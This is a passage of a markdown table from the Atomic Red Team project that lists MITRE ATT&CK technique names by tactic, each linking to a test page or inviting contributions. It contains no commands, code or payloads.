| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Software Deployment Tools](../../T1072/T1072.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | [Video Capture](../../T1125/T1125.md) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | [Non-Standard Port](../../T1571/T1571.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | [Inter-Process Communication](../../T1559/T1559.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Hypervisor CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Cloud Administration Command](../../T1651/T1651.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [System Location Discovery](../../T1614/T1614.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | [Serverless Execution](../../T1648/T1648.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Modify Registry](../../T1112/T1112.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Debugger Evasion](../../T1622/T1622.md) | | | | | |
|
||||
| | | [Time Providers](../../T1547.003/T1547.003.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | | |
|
||||
| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | | |
|
||||
| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Poisoned Pipeline Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
